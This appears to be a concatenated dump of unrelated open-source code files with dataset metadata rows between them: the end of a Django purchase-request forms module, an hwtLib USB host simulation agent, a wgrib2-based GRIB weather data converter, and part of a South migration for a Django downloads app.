super(PurchaseItemForm, self).__init__(*args, **kwargs)
self.fields['capsule'].widget.attrs['readonly'] = 'readonly'
#self.fields['default_price'].widget = forms.HiddenInput()
#self.fields['default_price'].widget.attrs['readonly'] = 'readonly'
class MyRequestForm(forms.ModelForm):
class Meta:
model = Request
#fields = ('purchaseitem','user', 'quantity_queued',)
#readonly_fields = ('purchaseitem','user',)
exclude = ('user',)
widgets = {
'purchaseitem': SelectedReadonly(),
#'user': SelectedReadonly(),
#'user': forms.HiddenInput(),
#'user': forms.Select(),
#'user': forms.TextInput(),
}
def __init__(self, *args, **kwargs):
super(MyRequestForm, self).__init__(*args, **kwargs)
self.fields['purchaseitem'].widget.attrs['readonly'] = 'readonly'
self.fields['purchaseitem'].label = 'Item'
self.fields['quantity_queued'].label = 'Quantity'
def clean_quantity_queued(self):
qty = self.cleaned_data['quantity_queued']
my_u_unit = self.cleaned_data['purchaseitem'].purchase.u_unit
if qty < 0:
raise forms.ValidationError("Values cannot be negative.")
if qty % my_u_unit != 0:
raise forms.ValidationError('Each value should be multiples of '
+ str(my_u_unit))
return qty
def clean(self):
cleaned_data = super(MyRequestForm, self).clean()
purchaseitem = cleaned_data.get("purchaseitem")
purchase = purchaseitem.purchase
if purchase.is_not_open():
raise forms.ValidationError("The purchase is not yet open.")
if purchase.is_ended():
raise forms.ValidationError("The purchase is aleady ended.")
if purchase.is_closed:
raise forms.ValidationError("The purchase is closed.")
return cleaned_data
| bsd-3-clause | -2,064,641,096,433,153,300 | 36.324675 | 76 | 0.618302 | false |
Nic30/hwtLib | hwtLib/peripheral/usb/sim/usb_agent_host.py | 1 | 16690 | from typing import Deque, Union, Optional, List
from hwt.code import Concat
from hwt.hdl.types.bitsVal import BitsVal
from hwt.hdl.types.struct import HStruct
from hwt.hdl.types.structValBase import StructValBase
from hwt.hdl.value import HValue
from hwt.synthesizer.rtlLevel.constants import NOT_SPECIFIED
from hwtLib.peripheral.usb.constants import USB_PID
from hwtLib.peripheral.usb.descriptors.bundle import UsbDescriptorBundle, \
UsbNoSuchDescriptor
from hwtLib.peripheral.usb.descriptors.cdc import usb_descriptor_functional_header, \
USB_CDC_DESCRIPTOR_SUBTYPE, usb_descriptor_functional_header_t, \
usb_descriptor_functional_call_management_t, \
usb_descriptor_functional_abstract_control_management_t, \
usb_define_descriptor_functional_union_t
from hwtLib.peripheral.usb.descriptors.std import usb_descriptor_interface_t, \
USB_DEVICE_CLASS, usb_descriptor_header_t, USB_DESCRIPTOR_TYPE, \
usb_descriptor_configuration_t, usb_descriptor_endpoint_t, \
make_usb_device_request_get_descr, usb_define_descriptor_string, \
usb_descriptor_device_t, usb_descriptor_device_qualifier_t, \
usb_define_descriptor_string0, USB_ENDPOINT_DIR
from hwtLib.peripheral.usb.device_request import make_usb_device_request, \
USB_REQUEST_TYPE_RECIPIENT, USB_REQUEST_TYPE_TYPE, \
USB_REQUEST_TYPE_DIRECTION, USB_REQUEST
from hwtLib.peripheral.usb.sim.agent_base import UsbAgent, UsbPacketToken, \
UsbPacketData, UsbPacketHandshake
from hwtLib.types.ctypes import uint8_t
class UsbHostAgent(UsbAgent):
"""
This agent uses rx and tx queue to comunicate with a USB device.
It performs bus enumerations, sets address to a device and downloads
the descriptors. Note that the agent is written in a way which allows for easy
extension to a driver which can parse the specific descriptors and comunicate with devices further.
"""
def __init__(self,
rx: Deque[Union[UsbPacketToken, UsbPacketHandshake, UsbPacketData]],
tx: Deque[Union[UsbPacketToken, UsbPacketHandshake, UsbPacketData]]):
super(UsbHostAgent, self).__init__(rx, tx)
# the addresses are not asigned yet this dictionary will be filled during device enumeration
self.descr = {}
self._descriptors_downloaded = False
def parse_interface_functional_descriptor(self, interface_descr: StructValBase, data:BitsVal):
bInterfaceClass = int(interface_descr.body.bInterfaceClass)
if bInterfaceClass == USB_DEVICE_CLASS.CDC_CONTROL:
h_t = usb_descriptor_functional_header
header = data[h_t.bit_length():]._reinterpret_cast(h_t)
sub_t = int(header.bDescriptorSubtype)
if sub_t == USB_CDC_DESCRIPTOR_SUBTYPE.HEADER:
descr_t = usb_descriptor_functional_header_t
elif sub_t == USB_CDC_DESCRIPTOR_SUBTYPE.CALL_MANAGEMENT_FUNCTIONAL:
descr_t = usb_descriptor_functional_call_management_t
elif sub_t == USB_CDC_DESCRIPTOR_SUBTYPE.ABSTRACT_CONTROL_MANAGEMENT:
descr_t = usb_descriptor_functional_abstract_control_management_t
elif sub_t == USB_CDC_DESCRIPTOR_SUBTYPE.UNION:
slave_cnt = (data._dtype.bit_length() - h_t.bit_length() - 8) // 8
descr_t = usb_define_descriptor_functional_union_t(slave_cnt)
assert data._dtype.bit_length() == descr_t.bit_length()
return data._reinterpret_cast(descr_t)
else:
raise NotImplementedError()
def parse_configuration_descriptor_bundle(self, data_bytes: List[int]):
data = [d if isinstance(d, HValue) else uint8_t.from_py(d) for d in data_bytes]
data = Concat(*reversed(data))
offset = 0
end = data._dtype.bit_length()
header_width = usb_descriptor_header_t.bit_length()
descriptors = []
interface_descr = None
while offset < end:
header = data[header_width + offset: offset]
header = header._reinterpret_cast(usb_descriptor_header_t)
descr_typeId = int(header.bDescriptorType)
descr_width = int(header.bLength) * 8
try:
d = data[descr_width + offset: offset]
except IndexError:
raise IndexError("The input data is incomplete, the header suggest additional data",
offset, descr_width, end)
if descr_typeId == USB_DESCRIPTOR_TYPE.CONFIGURATION:
t = usb_descriptor_configuration_t
assert descr_width == t.bit_length()
d = d._reinterpret_cast(t)
interface_descr = None
elif descr_typeId == USB_DESCRIPTOR_TYPE.INTERFACE:
# :note: interface descriptors are class dependent,
# the class can be resolved from first interface descriptor
# next interface descriptors may be functional descriptors
t = usb_descriptor_interface_t
assert d._dtype.bit_length() == t.bit_length(), (d._dtype.bit_length(), t.bit_length())
d = d._reinterpret_cast(t)
interface_descr = d
elif descr_typeId == USB_DESCRIPTOR_TYPE.ENDPOINT:
t = usb_descriptor_endpoint_t
assert descr_width == t.bit_length()
d = d._reinterpret_cast(t)
elif descr_typeId == USB_DESCRIPTOR_TYPE.FUNCTIONAL:
d = self.parse_interface_functional_descriptor(interface_descr, d)
else:
raise NotImplementedError(descr_typeId)
descriptors.append(d)
offset += descr_width
return descriptors
def get_max_packet_size(self, addr:int, endp: int, direction: USB_ENDPOINT_DIR):
ddb: UsbDescriptorBundle = self.descr.get(addr, None)
if ddb is None:
max_packet_size = 64
else:
if endp == 0:
d = ddb.get_descriptor(usb_descriptor_device_t, 0)[1]
max_packet_size = int(d.body.bMaxPacketSize)
else:
max_packet_size = None
for des in ddb:
if des._dtype == usb_descriptor_endpoint_t and \
int(des.body.bEndpointAddress) == endp and \
int(des.body.bEndpointAddressDir) == direction:
max_packet_size = int(des.body.wMaxPacketSize)
break
if max_packet_size is None:
raise ValueError("Can not find configuration for endpoint in descriptors", endp, ddb)
return max_packet_size
def receive_bulk(self, addr: int, endp: int, pid_init: USB_PID, size=NOT_SPECIFIED) -> List[int]:
max_packet_size = self.get_max_packet_size(addr, endp, USB_ENDPOINT_DIR.IN)
pid = pid_init
# start recieveing the data
yield from self.send(UsbPacketToken(USB_PID.TOKEN_IN, addr, endp))
# can receive data or STALL if the descriptor is not present
d_raw = yield from self.receive(NOT_SPECIFIED)
if isinstance(d_raw, UsbPacketData):
assert d_raw.pid == pid, (d_raw.pid, pid)
# descriptor data
yield from self.send_ack()
if size is not NOT_SPECIFIED:
return d_raw.data
# could be actually larger in the case when EP0 is not configured yet
if len(d_raw.data) >= max_packet_size:
# coud be possibly split into multiple packets
# if the first chunk was just of pmax_packet_size and this is the size what we are asking for
while True:
if pid == USB_PID.DATA_0:
pid = USB_PID.DATA_1
elif pid == USB_PID.DATA_1:
pid = USB_PID.DATA_0
else:
raise NotImplementedError(pid)
yield from self.send(UsbPacketToken(USB_PID.TOKEN_IN, addr, endp))
descr_part = yield from self.receive(UsbPacketData)
assert descr_part.pid == pid, (d_raw.pid, pid)
d_raw.data.extend(descr_part.data)
yield from self.send_ack()
if len(descr_part.data) < max_packet_size:
break
return d_raw.data
elif isinstance(d_raw, UsbPacketHandshake):
# packet which means some error
if d_raw.pid == USB_PID.HS_STALL:
raise UsbNoSuchDescriptor()
elif d_raw.pid == USB_PID.HS_NACK:
return None
else:
raise NotImplementedError()
else:
raise NotImplementedError()
def transmit_bulk(self, addr: int, endp: int, pid_init: USB_PID, data_bytes: List[int]):
max_packet_size = self.get_max_packet_size(addr, endp, USB_ENDPOINT_DIR.OUT)
pid = pid_init
# start sending the data
begin = 0
end = len(data_bytes)
while True:
yield from self.send(UsbPacketToken(USB_PID.TOKEN_OUT, addr, endp))
_end = min(begin + max_packet_size, end)
p = UsbPacketData(pid, data_bytes[begin:_end])
yield from self.send(p)
yield from self.wait_on_ack()
begin = _end
if pid == USB_PID.DATA_0:
pid = USB_PID.DATA_1
elif pid == USB_PID.DATA_1:
pid = USB_PID.DATA_0
else:
raise ValueError(pid)
if len(p.data) < max_packet_size:
break
def control_read(self, addr, bmRequestType_type:USB_REQUEST_TYPE_TYPE, bRequest:int,
wValue:int, wIndex:int, wLength:int,
bmRequestType_recipient:USB_REQUEST_TYPE_RECIPIENT=USB_REQUEST_TYPE_RECIPIENT.DEVICE,
bmRequestType_data_transfer_direction:USB_REQUEST_TYPE_DIRECTION=USB_REQUEST_TYPE_DIRECTION.DEV_TO_HOST,
):
dev_req = make_usb_device_request(
bmRequestType_recipient=bmRequestType_recipient,
bmRequestType_type=bmRequestType_type,
bmRequestType_data_transfer_direction=bmRequestType_data_transfer_direction,
bRequest=bRequest,
wValue=wValue,
wIndex=wIndex,
wLength=wLength)
# read the device descriptor
# SETUP STAGE, send request for descriptor downloading
yield from self.send(UsbPacketToken(USB_PID.TOKEN_SETUP, addr, 0))
yield from self.send(UsbPacketData(USB_PID.DATA_0, dev_req))
yield from self.wait_on_ack()
# DATA stage
data = yield from self.receive_bulk(addr, 0, USB_PID.DATA_1)
# STATUS stage
yield from self.transmit_bulk(addr, 0, USB_PID.DATA_1, [])
return data
def control_write(self, addr:int, ep:int, bmRequestType_type:USB_REQUEST_TYPE_TYPE,
bRequest:int, wValue:int, wIndex:int, buff:List[int],
bmRequestType_recipient:USB_REQUEST_TYPE_RECIPIENT=USB_REQUEST_TYPE_RECIPIENT.DEVICE,
bmRequestType_data_transfer_direction:USB_REQUEST_TYPE_DIRECTION=USB_REQUEST_TYPE_DIRECTION.HOST_TO_DEV,
):
p = UsbPacketToken(USB_PID.TOKEN_SETUP, addr, ep)
yield from self.send(p)
dev_req = make_usb_device_request(
bmRequestType_recipient=bmRequestType_recipient,
bmRequestType_type=bmRequestType_type,
bmRequestType_data_transfer_direction=bmRequestType_data_transfer_direction,
bRequest=bRequest,
wValue=wValue,
wIndex=wIndex,
wLength=len(buff))
yield from self.send(UsbPacketData(USB_PID.DATA_0, dev_req))
yield from self.wait_on_ack()
if buff:
yield from self.transmit_bulk(addr, 0, USB_PID.DATA_1, buff)
else:
# no data present skiping write
pass
# STATUS stage
data = yield from self.receive_bulk(addr, 0, USB_PID.DATA_1)
assert not data, data
def download_descriptor(self,
addr: int,
descriptor_t: Union[HStruct, str],
index: int,
wIndex:int=0,
wLength: Optional[int]=NOT_SPECIFIED):
dev_req_get_descr = make_usb_device_request_get_descr(
descriptor_t, index, wIndex=wIndex, wLength=wLength)
# read the device descriptor
# SETUP STAGE, send request for descriptor downloading
yield from self.send(UsbPacketToken(USB_PID.TOKEN_SETUP, addr, 0))
yield from self.send(UsbPacketData(USB_PID.DATA_0, dev_req_get_descr))
yield from self.wait_on_ack()
# DATA stage
descr = yield from self.receive_bulk(addr, 0, USB_PID.DATA_1)
# assert len(descr) == int(dev_req_get_descr.wLength), (descriptor_t, wIndex, len(descr), int(dev_req_get_descr.wLength))
if wLength is NOT_SPECIFIED:
if descriptor_t is str:
char_cnt = (len(descr) - usb_descriptor_header_t.bit_length() // 8) // 2
if index == 0:
descriptor_t = usb_define_descriptor_string0(char_cnt)
else:
descriptor_t = usb_define_descriptor_string(char_cnt)
descr = UsbPacketData(USB_PID.DATA_1, descr)
descr = descr.unpack(descriptor_t)
else:
assert len(descr) == int(dev_req_get_descr.wLength), (len(descr), int(dev_req_get_descr.wLength))
assert descriptor_t is usb_descriptor_configuration_t, descriptor_t
descr = self.parse_configuration_descriptor_bundle(descr)
# STATUS stage
yield from self.send(UsbPacketToken(USB_PID.TOKEN_OUT, addr, 0))
yield from self.send(UsbPacketData(USB_PID.DATA_1, []))
yield from self.wait_on_ack()
return descr
def proc(self):
new_addr = len(self.descr) + 1
# init device address
yield from self.control_write(0, 0,
bmRequestType_type=USB_REQUEST_TYPE_TYPE.STANDARD,
bRequest=USB_REQUEST.SET_ADDRESS,
wValue=new_addr,
wIndex=0,
buff=[])
# :note: device address now set, starting download of descriptors
dev_descr = yield from self.download_descriptor(new_addr, usb_descriptor_device_t, 0)
ddb = self.descr[new_addr] = UsbDescriptorBundle()
ddb.append(dev_descr)
bNumConfigurations = int(dev_descr.body.bNumConfigurations)
assert bNumConfigurations > 0, "Device must have some configuration descriptors"
for i in range(bNumConfigurations):
# first we have to resolve wTotalLength (the total lenght of configuration bundle)
conf_descr = yield from self.download_descriptor(new_addr, usb_descriptor_configuration_t, i)
size = int(conf_descr.body.wTotalLength)
# now we download all descriptors in configuration bundle
conf_descr_bundle = yield from self.download_descriptor(
new_addr, usb_descriptor_configuration_t, i, wLength=size)
real_size = sum(c._dtype.bit_length() for c in conf_descr_bundle) // 8
assert real_size == size, (real_size, size, conf_descr_bundle)
ddb.extend(conf_descr_bundle)
while True:
try:
yield from self.download_descriptor(
new_addr, usb_descriptor_device_qualifier_t, 0
)
except UsbNoSuchDescriptor:
break
raise NotImplementedError("usb_descriptor_device_qualifier")
# now read all string descriptors
str_descr0 = None
for i in range(0, 255):
try:
str_descr = yield from self.download_descriptor(
new_addr, str, i,
wIndex=0 if i == 0 else int(str_descr0.body[0])
)
except UsbNoSuchDescriptor:
if i == 0:
raise UsbNoSuchDescriptor("Need at least string descriptor 0 with language code")
else:
# other are not required
break
if i == 0:
str_descr0 = str_descr
ddb.append(str_descr)
self._descriptors_downloaded = True
| mit | 3,811,309,973,746,290,000 | 46.146893 | 129 | 0.594548 | false |
stephenlienharrell/WPEAR | wpear/DataConverter.py | 1 | 9026 | #! /usr/bin/env python
import os
import shlex
import shutil
import subprocess
import sys
WGRIB_PATH='./wgrib'
EGREP_PATH='egrep'
GREP_PATH='grep'
NCEP_GRID_TYPE=3
# http://www.nco.ncep.noaa.gov/pmb/docs/on388/tableb.html
class DataConverter:
FNULL=open(os.devnull, 'w')
def __init__(self, wgrib_path=WGRIB_PATH, egrep_path=EGREP_PATH, grep_path=GREP_PATH, ncep_grid_type=NCEP_GRID_TYPE):
self.wgrib_path = wgrib_path
self.egrep_path = egrep_path
self.grep_path = grep_path
self.grid_type = ncep_grid_type
def interploateGrid(self, inputfilepath, outputfilepath):
# This isn't working. to fix maybe http://www.ftp.cpc.ncep.noaa.gov/wd51we/wgrib2/tricks.wgrib2 #21
cmd1 = '{} {} -new_grid ncep grid {} {}'.format(self.wgrib_path, inputfilepath, self.grid_type, outputfilepath)
ps = subprocess.check_output(shlex.split(cmd1), stderr=subprocess.STDOUT)
def extractMessages(self, inputfilepath, varlist, outputfilepath):
cmd1 = '{} {} -s'.format(self.wgrib_path, inputfilepath)
try:
ps = subprocess.check_output(shlex.split(cmd1), stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
# check if the e.output starts with :*** FATAL ERROR: Statistical processing bad n=0 ***
# http://www.ftp.cpc.ncep.noaa.gov/wd51we/wgrib2/tricks.wgrib2
# this may happen several times. in future, handle as many times as no of error messages
text = os.linesep.join([s for s in e.output.splitlines() if s])
print text
if text.startswith('*** FATAL ERROR: Statistical processing bad n=0 ***') :
lastline = text.splitlines()[-1]
errmsgno = int(str(lastline.split(':')[0]).strip())
# creating new file without error msg
newinputfilepath = os.path.splitext(inputfilepath)[0] + 'fixstat' + os.path.splitext(inputfilepath)[1]
newfilecmd1 = '{} {} -pdt'.format(self.wgrib_path, inputfilepath)
newfilecmd2 = '{} -v ^{}:'.format(self.egrep_path, errmsgno)
newfilecmd3 = '{} -i {} -grib {}'.format(self.wgrib_path, inputfilepath, newinputfilepath)
p1 = subprocess.Popen(shlex.split(newfilecmd1), stdout=subprocess.PIPE)
p2 = subprocess.Popen(shlex.split(newfilecmd2), stdin=p1.stdout, stdout=subprocess.PIPE)
p3 = subprocess.Popen(shlex.split(newfilecmd3), stdin=p2.stdout, stdout=self.FNULL)
p3.wait()
inputfilepath = newinputfilepath
cmd1 = '{} {} -s'.format(self.wgrib_path, newinputfilepath)
else:
print 'extract1message failed for file = {}\n'.format(inputfilepath)
pipe1 = subprocess.Popen(shlex.split(cmd1), stdout=subprocess.PIPE)
greplist = [self.grep_path]
for var in varlist:
greplist.append('-e')
greplist.append(var)
pipe2 = subprocess.Popen(greplist, stdin=pipe1.stdout, stdout=subprocess.PIPE)
cmd3 = '{} -i {} -grib {}'.format(self.wgrib_path, inputfilepath, outputfilepath)
pipe3 = subprocess.Popen(shlex.split(cmd3), stdin=pipe2.stdout, stdout=self.FNULL)
pipe3.wait()
def subsetRegion(self, inputfilepath, minlat, maxlat, minlon, maxlon, outputfilepath):
cmd = '{} {} -small_grib {}:{} {}:{} {} -set_grib_type same'.format(self.wgrib_path, inputfilepath, minlon, maxlon, minlat, maxlat, outputfilepath)
try:
subprocess.check_call(shlex.split(cmd), stdout=self.FNULL)
except subprocess.CalledProcessError as e:
print e.cmd
print e.returncode
print e.output
def extractMessagesAndSubsetRegion(self, inputfilepath, varlist, tempfiledir, minlat, maxlat, minlon, maxlon, outputfilepath):
try:
os.makedirs(tempfiledir)
except OSError:
pass
if tempfiledir.endswith('/'):
tempfilepath = tempfiledir + inputfilepath.split('/')[-1]
tempfilepath2 = tempfiledir + inputfilepath.split('/')[-1] + 'temp2'
else:
tempfilepath = tempfiledir + '/' + inputfilepath.split('/')[-1]
tempfilepath2 = tempfiledir + '/' + inputfilepath.split('/')[-1] + 'temp2'
self.subsetRegion(inputfilepath, minlat, maxlat, minlon, maxlon, tempfilepath)
self.extractMessages(tempfilepath, varlist, tempfilepath2)
if inputfilepath.split('/')[-1].startswith('hrrr'):
self.interpolateGridHRRR(tempfilepath2, outputfilepath)
elif inputfilepath.split('/')[-1].startswith('rtma'):
self.interpolateGridRTMA(tempfilepath2, outputfilepath)
else:
raise AttributeError('no known file format found')
os.remove(tempfilepath)
os.remove(tempfilepath2)
def interpolateGridHRRR(self, inputfilepath, outputfilepath, nx=500, ny=500, dx=1000, dy=1000):
# nx = number of grid points in x-direction
# ny = number of grid points in y-direction
# dx = grid cell size in meters in x-direction
# dy = grid cell size in meters in y direction
cmd = '{} -set_grib_type same {} -new_grid_winds grid -new_grid lambert:262.5:38.5:38.5 271.821305:{}:{} 38.261837:{}:{} {}'.format(self.wgrib_path, inputfilepath, nx, dx, ny, dy, outputfilepath)
try:
subprocess.check_call(shlex.split(cmd), stdout=self.FNULL)
except subprocess.CalledProcessError as e:
print e.cmd
print e.returncode
print e.output
def interpolateGridRTMA(self, inputfilepath, outputfilepath, nx=500, ny=500, dx=1000, dy=1000):
# nx = number of grid points in x-direction
# ny = number of grid points in y-direction
# dx = grid cell size in meters in x-direction
# dy = grid cell size in meters in y direction
cmd = '{} -set_grib_type same {} -new_grid_winds grid -new_grid lambert:265:25:25 272.014856:{}:{} 38.231829:{}:{} {}'.format(self.wgrib_path, inputfilepath, nx, dx, ny, dy, outputfilepath)
try:
subprocess.check_call(shlex.split(cmd), stdout=self.FNULL)
except subprocess.CalledProcessError as e:
print e.cmd
print e.returncode
print e.output
###############################################################################################
########################################### Test ##############################################
###############################################################################################
# dc = DataConverter()
###############################################################################################
######################################### extractMessages #####################################
###############################################################################################
# dc.extractMessages('sourceFileDownloads/rtma2p5.t00z.2dvaranl_ndfd.grb2', [':DPT:2 m above ground', ':TMP:2 m above ground'], 'sourceFileDownloads/em_rtma2p5.t00z.2dvaranl_ndfd.grb2')
# dc.extractMessages('sourceFileDownloads/hrrr.t00z.wrfsfcf18.grib2', [':TMP:500 mb', ':WIND:10 m above ground'], 'sourceFileDownloads/em_hrrr.t00z.wrfsfcf18.grib2')
# dc.extractMessages('sourceFileDownloads/hrrr.t00z.wrfsfcf00.grib2', [':TMP:500 mb', ':WIND:10 m above ground'], 'sourceFileDownloads/em_hrrr.t00z.wrfsfcf00.grib2')
###############################################################################################
######################################### subsetRegion ########################################
###############################################################################################
# dc.subsetRegion('sourceFileDownloads/em_rtma2p5.t00z.2dvaranl_ndfd.grb2', 38.22, 41.22, -87.79, -84.79, 'sourceFileDownloads/sem_rtma2p5.t00z.2dvaranl_ndfd.grb2')
# dc.subsetRegion('sourceFileDownloads/em_hrrr.t00z.wrfsfcf18.grib2', 38.22, 41.22, -87.79, -84.79, 'sourceFileDownloads/sem_hrrr.t00z.wrfsfcf18.grib2')
# dc.subsetRegion('sourceFileDownloads/em_hrrr.t00z.wrfsfcf00.grib2', 38.22, 41.22, -87.79, -84.79, 'sourceFileDownloads/sem_hrrr.t00z.wrfsfcf00.grib2')
###############################################################################################
############################### extractMessagesAndSubsetRegion ################################
###############################################################################################
# dc.extractMessagesAndSubsetRegion('sourceFileDownloads/rtma2p5.t00z.2dvaranl_ndfd.grb2', [':DPT:2 m above ground', ':TMP:2 m above ground'], 'temp/', 38.22, 41.22, -87.79, -84.79, 'sourceFileDownloads/sem_rtma2p5.t00z.2dvaranl_ndfd.grb2')
# dc.extractMessagesAndSubsetRegion('sourceFileDownloads/hrrr.t00z.wrfsfcf00.grib2', [':TMP:500 mb', ':WIND:10 m above ground'], 'temp', 38.22, 41.22, -87.79, -84.79, 'sourceFileDownloads/sem_hrrr.t00z.wrfsfcf00.grib2')
| gpl-3.0 | 3,493,325,894,899,479,600 | 54.374233 | 240 | 0.574008 | false |
praekelt/jmbo-downloads | downloads/migrations/0002_rename_imagemod_to_temporarydownload.py | 1 | 13460 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Rename model 'TextOverlayImageMod'
db.rename_table('downloads_textoverlayimagemod', 'downloads_textoverlaytemporarydownload')
# Adding field 'Download.visible'
db.add_column('downloads_download', 'visible',
self.gf('django.db.models.fields.BooleanField')(default=True),
keep_default=False)
def backwards(self, orm):
# Renaming model 'TextOverlayTemporaryDownload'
db.rename_table('downloads_textoverlaytemporarydownload', 'downloads_textoverlayimagemod')
# Removing field 'Download.visible'
db.delete_column('downloads_download', 'visible')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'category.category': {
'Meta': {'ordering': "('title',)", 'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'category.tag': {
'Meta': {'ordering': "('title',)", 'object_name': 'Tag'},
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'downloads.download': {
'Meta': {'ordering': "['primary_category', 'title']", 'object_name': 'Download', '_ormbases': ['jmbo.ModelBase']},
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'file_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'modelbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['jmbo.ModelBase']", 'unique': 'True', 'primary_key': 'True'}),
'do_not_list': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'downloads.textoverlaytemporarydownload': {
'Meta': {'object_name': 'TextOverlayTemporaryDownload'},
'background_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'colour': ('downloads.fields.ColourField', [], {'max_length': '7'}),
'download_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['downloads.Download']", 'unique': 'True', 'primary_key': 'True'}),
'font': ('django.db.models.fields.FilePathField', [], {'path': "'/usr/share/fonts/truetype/'", 'max_length': '100', 'recursive': 'True'}),
'font_size': ('django.db.models.fields.PositiveIntegerField', [], {}),
'height': ('django.db.models.fields.PositiveIntegerField', [], {}),
'text': ('django.db.models.fields.TextField', [], {}),
'unique_per_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'width': ('django.db.models.fields.PositiveIntegerField', [], {}),
'x': ('django.db.models.fields.PositiveIntegerField', [], {}),
'y': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'jmbo.modelbase': {
'Meta': {'ordering': "('-created',)", 'object_name': 'ModelBase'},
'anonymous_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'anonymous_likes': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'comments_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comments_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}),
'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modelbase_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'likes_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'likes_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'primary_category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'primary_modelbase_set'", 'null': 'True', 'to': "orm['category.Category']"}),
'publish_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'publishers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['publisher.Publisher']", 'null': 'True', 'blank': 'True'}),
'retract_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
